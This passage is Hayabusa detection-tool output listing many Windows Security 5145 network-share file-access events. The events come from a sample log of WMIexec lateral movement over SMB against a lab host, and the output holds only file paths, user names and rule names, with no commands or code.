10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\es : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\et : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\fi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\fr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\he : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\hr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\hu : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\it : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ja : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ko : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\lt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\lv : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\nl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\no : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pt-BR : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ro : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ru : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sk : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sr-Latn-RS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.447 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sv : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\th : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\tr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\uk : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HANS : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HANT : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HK : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs\DevInvCache : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\apppatch64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\Custom : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\Custom\Custom64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\en-US : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppReadiness : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 